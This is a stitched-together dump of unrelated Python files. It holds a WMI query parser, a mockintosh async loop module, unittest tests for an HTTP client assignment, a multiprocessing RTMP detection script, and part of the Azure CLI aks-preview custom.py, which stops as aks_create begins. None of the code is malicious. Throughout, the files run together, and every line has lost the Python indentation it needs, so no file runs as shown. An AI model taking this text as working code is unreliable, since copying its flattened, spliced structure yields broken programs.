def _query(self): # pylint: disable=E0202
"""
Query WMI using WMI Query Language (WQL) & parse the results.
Returns: List of WMI objects or `TimeoutException`.
"""
try:
formated_property_names = ",".join(self.property_names)
wql = "Select {property_names} from {class_name}{filters}".format(
property_names=formated_property_names, class_name=self.class_name, filters=self.formatted_filters
)
self.logger.debug(u"Querying WMI: %s", wql)
except Exception as e:
self.logger.error(str(e))
return []
try:
# From: https://msdn.microsoft.com/en-us/library/aa393866(v=vs.85).aspx
flag_return_immediately = 0x10 # Default flag.
flag_forward_only = 0x20
flag_use_amended_qualifiers = 0x20000
query_flags = flag_return_immediately | flag_forward_only
# For the first query, cache the qualifiers to determine each
# propertie's "CounterType"
includes_qualifiers = self.is_raw_perf_class and self._property_counter_types is None
if includes_qualifiers:
self._property_counter_types = CaseInsensitiveDict()
query_flags |= flag_use_amended_qualifiers
raw_results = self.get_connection().ExecQuery(wql, "WQL", query_flags)
results = self._parse_results(raw_results, includes_qualifiers=includes_qualifiers)
except pywintypes.com_error:
self.logger.warning(u"Failed to execute WMI query (%s)", wql, exc_info=True)
results = []
return results
def _parse_results(self, raw_results, includes_qualifiers):
"""
Parse WMI query results in a more comprehensive form.
Returns: List of WMI objects
```
[
{
'freemegabytes': 19742.0,
'name': 'C:',
'avgdiskbytesperwrite': 1536.0
}, {
'freemegabytes': 19742.0,
'name': 'D:',
'avgdiskbytesperwrite': 1536.0
}
]
```
"""
results = []
for res in raw_results:
# Ensure all properties are available. Use case-insensitivity
# because some properties are returned with different cases.
item = CaseInsensitiveDict()
for prop_name in self.property_names:
item[prop_name] = None
for wmi_property in res.Properties_:
# IMPORTANT: To improve performance, only access the Qualifiers
# if the "CounterType" hasn't already been cached.
should_get_qualifier_type = (
includes_qualifiers and wmi_property.Name not in self._property_counter_types
)
if should_get_qualifier_type:
# Can't index into "Qualifiers_" for keys that don't exist
# without getting an exception.
qualifiers = dict((q.Name, q.Value) for q in wmi_property.Qualifiers_)
# Some properties like "Name" and "Timestamp_Sys100NS" do
# not have a "CounterType" (since they're not a counter).
# Therefore, they're ignored.
if "CounterType" in qualifiers:
counter_type = qualifiers["CounterType"]
self._property_counter_types[wmi_property.Name] = counter_type
self.logger.debug(
u"Caching property qualifier CounterType: %s.%s = %s",
self.class_name,
wmi_property.Name,
counter_type,
)
else:
self.logger.debug(
u"CounterType qualifier not found for %s.%s", self.class_name, wmi_property.Name
)
try:
item[wmi_property.Name] = float(wmi_property.Value)
except (TypeError, ValueError):
item[wmi_property.Name] = wmi_property.Value
results.append(item)
return results
|
_looping.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: __init__
:synopsis: module that contains asynchronous looping related methods.
"""
import sys
import threading
from mockintosh.services.asynchronous import AsyncService, AsyncConsumerGroup, AsyncActor, AsyncProducer, AsyncConsumer
from mockintosh.services.asynchronous.kafka import KafkaConsumerGroup # noqa: F401
from mockintosh.services.asynchronous.amqp import AmqpConsumerGroup # noqa: F401
from mockintosh.services.asynchronous.redis import RedisConsumerGroup # noqa: F401
try:
from mockintosh.services.asynchronous.gpubsub import GpubsubConsumerGroup # noqa: F401
except ModuleNotFoundError:
pass
try:
from mockintosh.services.asynchronous.amazonsqs import AmazonsqsConsumerGroup # noqa: F401
except ModuleNotFoundError:
pass
from mockintosh.services.asynchronous.mqtt import MqttConsumerGroup # noqa: F401
def run_loops():
for service in AsyncService.services:
class_name_prefix = service.type.capitalize()
consumer_groups = {}
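# One daemon thread per actor drives its produce loop; consumers are grouped by
# topic so that each topic is served by a single <service type>ConsumerGroup.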
for actor in service.actors:
t = threading.Thread(target=actor.run_produce_loop, args=(), kwargs={})
t.daemon = True
t.start()
if actor.consumer is not None:
if actor.consumer.topic not in consumer_groups.keys():
consumer_group = getattr(sys.modules[__name__], '%sConsumerGroup' % class_name_prefix)()
consumer_group.add_consumer(actor.consumer)
consumer_groups[actor.consumer.topic] = consumer_group
else:
consumer_groups[actor.consumer.topic].add_consumer(actor.consumer)
for consumer_group in AsyncConsumerGroup.groups:
t = threading.Thread(target=consumer_group.consume, args=(), kwargs={})
t.daemon = True
t.start()
def stop_loops():
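# Signal every actor and consumer group loop to exit, then reset the global registries.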
for actor in AsyncActor.actors:
actor.stop = True
for consumer_group in AsyncConsumerGroup.groups:
consumer_group.stop = True
AsyncService.services = []
AsyncActor.actors = []
AsyncProducer.producers = []
AsyncConsumer.consumers = []
AsyncConsumerGroup.groups = []
|
freetests.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright 2013 Abram Hindle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# run python freetests.py
import unittest
import httpclient
import http.server
import threading
import socketserver
import random
import time
import urllib.parse
import json
BASEHOST = '127.0.0.1'
BASEPORT = 27600 + random.randint(1,100)
httpclass = httpclient
#import mysolution
#httpclass = mysolution
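# Whatever module httpclass points at is expected to expose an HTTPClient class
# whose GET(url) and POST(url, args=...) return an object with .code and .body
# (this is what the tests below rely on).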
# Sorry but in Python this comes out of the box!
class MyHTTPHandler(http.server.BaseHTTPRequestHandler):
post = None
get = None
def do_POST(self):
try:
if (self.post == None):
return None
else:
return self.post()
except Exception as e:
print("Exception %s\n" % e)
raise e
def do_GET(self):
try:
print("GET %s\n" % self.path)
if (self.get == None):
return None
else:
return self.get()
except Exception as e:
print("Exception %s\n" % e)
raise e
def make_http_server(host = BASEHOST, port = BASEPORT):
return http.server.HTTPServer( (host, port) , MyHTTPHandler)
# always returns 404
def nothing_available(self):
self.send_error(404, "File not found")
self.end_headers()
self.wfile.write(bytes("","utf-8"))
# repeats your path back
def echo_path_get(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes("%s\n" % self.path,"utf-8"))
# repeats your post back as json
def echo_post(self):
length = int(self.headers['Content-Length'])
post_data = urllib.parse.parse_qs(self.rfile.read(length).decode('utf-8'))
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(post_data),"utf-8"))
def header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def die_on_method(self):
response = 405
errors = []
errors.append("Method Not Allowed")
if 'Host' not in self.headers:
errors.append("No Host header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
def post_header_check(self):
response = 200
errors = []
if 'Host' not in self.headers:
response = 400
errors.append("No Host header found")
if 'Content-length' not in self.headers:
response = 400
errors.append("No Content-Length header found")
self.send_response(response)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(bytes(json.dumps(errors),"utf-8"))
class TestHTTPClient(unittest.TestCase):
httpd = None
running = False
@classmethod
def setUpClass(self):
'''Cache the httpd server and run it as a thread'''
if (TestHTTPClient.httpd == None):
try:
self.thread = threading.Thread(target=self.run_server)
self.thread.start()
time.sleep(1)
except Exception as e:
print(e)
print("setUP: Thread died")
raise(e)
@classmethod
def run_server(self):
'''run the httpd server in a thread'''
try:
socketserver.TCPServer.allow_reuse_address = True
http.server.HTTPServer.allow_reuse_address = True
TestHTTPClient.httpd = make_http_server()
print("HTTP UP!\n")
TestHTTPClient.httpd.serve_forever()
print("HTTP has been shutdown!\n")
except Exception as e:
print(e)
print("run_server: Thread died")
def test404GET(self):
'''Test against 404 errors'''
MyHTTPHandler.get = nothing_available
http = httpclass.HTTPClient()
req = http.GET("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def test404POST(self):
'''Test against 404 errors'''
MyHTTPHandler.post = nothing_available
http = httpclass.HTTPClient()
req = http.POST("http://%s:%d/49872398432" % (BASEHOST,BASEPORT) )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 404)
def testGET(self):
'''Test HTTP GET'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
# print(f"the req is.....:\n{req.body}")
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
# a = "Data: [%s] " % req.body
# print(f"\n\n\nI want:\n{req.body.find(path)>=0}\nTo be equal to:\n{a}\n\n\n")
self.assertTrue(req.body.find(path)>=0, "Data: [%s] " % req.body)
def testGETHeaders(self):
'''Test HTTP GET Headers'''
MyHTTPHandler.get = header_check
MyHTTPHandler.post = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.GET( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
def testPOSTHeaders(self):
'''Test HTTP POST Headers'''
MyHTTPHandler.post = post_header_check
MyHTTPHandler.get = die_on_method
http = httpclass.HTTPClient()
path = "abcdef/gjkd/dsadas"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
req = http.POST( url )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200,"Code is %s but I wanted a 200 OK" % req.code)
# consider disabling this test until everything else works
def testInternetGets(self):
'''Test HTTP GET in the wild; these webservers are far less forgiving'''
MyHTTPHandler.get = echo_path_get
http = httpclass.HTTPClient()
urls = [
"http://www.cs.ualberta.ca/",
"http://softwareprocess.es/static/SoftwareProcess.es.html",
"http://c2.com/cgi/wiki?CommonLispHyperSpec&P=2",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
# args = {'a':'aaaa',
# 'b':'bbb',
# 'c':'c',
# 'd':'01'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
zzj_monitor_rtmp.py
|
import os
import os.path as osp
import time
import multiprocessing as mp
from process_rtmp import *
max_q_size = 1
queues = [mp.Queue(maxsize=2) for i in range(0, max_q_size+1) ]
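# Pipeline sketch (inferred; process_rtmp is not shown here): load_im pushes frames
# into queues[0]; first_layer_detection consumes queues[0] and writes detections to
# queues[1] (the post_process stage is currently disabled).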
processes = []
processes.append(mp.Process(target=load_im, args=(queues[0],None)))
processes.append(mp.Process(target=first_layer_detection, args=(queues[0], queues[1] )))
#processes.append(mp.Process(target=post_process, args=(queues[1], None )))
for process in processes:
process.daemon = True
process.start()
for process in processes:
process.join()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import base64
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from math import isnan
import colorama # pylint: disable=import-error
import yaml # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.azclierror import (
ArgumentUsageError,
InvalidArgumentValueError,
)
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.commands.client_factory import (
get_mgmt_service_client,
get_subscription_id,
)
from azure.cli.core.util import (
get_file_json,
in_cloud_console,
read_file_content,
sdk_no_wait,
shell_safe_json_parse,
)
from azure.graphrbac.models import (
ApplicationCreateParameters,
KeyCredential,
PasswordCredential,
ServicePrincipalCreateParameters,
)
from dateutil.parser import parse # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from knack.log import get_logger
from knack.prompting import NoTTYException, prompt_pass, prompt_y_n
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
from six.moves.urllib.error import URLError # pylint: disable=import-error
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azext_aks_preview._client_factory import CUSTOM_MGMT_AKS_PREVIEW
from ._client_factory import (
cf_agent_pools,
cf_container_registry_service,
cf_nodepool_snapshots_client,
cf_mc_snapshots_client,
cf_storage,
get_auth_management_client,
get_graph_rbac_management_client,
get_msi_client,
get_resource_by_name,
)
from ._consts import (
ADDONS,
ADDONS_DESCRIPTIONS,
CONST_ACC_SGX_QUOTE_HELPER_ENABLED,
CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME,
CONST_AZURE_POLICY_ADDON_NAME,
CONST_CONFCOM_ADDON_NAME,
CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME,
CONST_INGRESS_APPGW_ADDON_NAME,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID,
CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME,
CONST_INGRESS_APPGW_SUBNET_CIDR,
CONST_INGRESS_APPGW_SUBNET_ID,
CONST_INGRESS_APPGW_WATCH_NAMESPACE,
CONST_KUBE_DASHBOARD_ADDON_NAME,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID,
CONST_MONITORING_ADDON_NAME,
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID,
CONST_MONITORING_USING_AAD_MSI_AUTH,
CONST_OPEN_SERVICE_MESH_ADDON_NAME,
CONST_ROTATION_POLL_INTERVAL,
CONST_SCALE_DOWN_MODE_DELETE,
CONST_SCALE_SET_PRIORITY_REGULAR,
CONST_SCALE_SET_PRIORITY_SPOT,
CONST_SECRET_ROTATION_ENABLED,
CONST_SPOT_EVICTION_POLICY_DELETE,
CONST_VIRTUAL_NODE_ADDON_NAME,
CONST_VIRTUAL_NODE_SUBNET_NAME,
)
from ._helpers import (
_trim_fqdn_name_containing_hcp,
)
from ._podidentity import (
_ensure_managed_identity_operator_permission,
_ensure_pod_identity_addon_is_enabled,
_fill_defaults_for_pod_identity_profile,
_update_addon_pod_identity,
)
from ._resourcegroup import get_rg_location
from ._roleassignments import (
add_role_assignment,
build_role_scope,
create_role_assignment,
resolve_object_id,
resolve_role_id,
)
from .addonconfiguration import (
add_ingress_appgw_addon_role_assignment,
add_monitoring_role_assignment,
add_virtual_node_role_assignment,
enable_addons,
ensure_container_insights_for_monitoring,
ensure_default_log_analytics_workspace_for_monitoring,
sanitize_loganalytics_ws_resource_id,
)
from .maintenanceconfiguration import (
aks_maintenanceconfiguration_update_internal,
)
from .vendored_sdks.azure_mgmt_preview_aks.v2022_04_02_preview.models import (
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
CreationData,
KubeletConfig,
LinuxOSConfig,
ManagedClusterAddonProfile,
ManagedClusterHTTPProxyConfig,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
PowerState,
Snapshot,
ManagedClusterSnapshot,
SysctlConfig,
UserAssignedIdentity,
)
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit, then opens a URL. Useful for waiting for a proxy to come up and then opening the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal',
value=0.1 * x, total_val=1.0)
try:
create_service_principal(
cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation',
value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete',
value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
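# e.g. (hypothetical values) name='myAKS', resource_group_name='my-rg',
# subscription_id='8ecadfc9-...' -> 'myAKS-my-rg-8ecadf'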
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub(
'[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
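# The on-disk JSON maps subscription_id -> {'client_secret': ..., 'service_principal': ...},
# so credentials for multiple subscriptions can live in the same file.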
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError(
'specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
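# Resolve the identifier: a GUID is treated as an appId, any other string as an
# identifier URI; if nothing matches, fall back to treating it as an object id.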
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(
filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError(
'When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, yes]):
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def subnet_role_assignment_exists(cli_ctx, scope):
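# 4d97b98b-1d4f-4787-a291-c67834d212e7 is the id of the built-in "Network Contributor" role definition.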
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
_re_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/snapshots/(.*)',
flags=re.IGNORECASE)
_re_mc_snapshot_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.containerservice/managedclustersnapshots/(.*)',
flags=re.IGNORECASE)
def _get_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_nodepool_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def _get_cluster_snapshot(cli_ctx, snapshot_id):
snapshot_id = snapshot_id.lower()
match = _re_mc_snapshot_resource_id.search(snapshot_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
snapshot_name = match.group(3)
snapshot_client = cf_mc_snapshots_client(
cli_ctx, subscription_id=subscription_id)
try:
snapshot = snapshot_client.get(resource_group_name, snapshot_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise InvalidArgumentValueError(
"Managed cluster snapshot {} not found.".format(snapshot_id))
raise CLIError(ex.message)
return snapshot
raise InvalidArgumentValueError(
"Cannot parse snapshot name from provided resource id {}.".format(snapshot_id))
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
from azure.cli.command_modules.acs.custom import _aks_browse
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser,
listen_address,
listen_port,
CUSTOM_MGMT_AKS_PREVIEW,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
# pylint: disable=unused-argument,too-many-locals
def aks_create(cmd,
client,
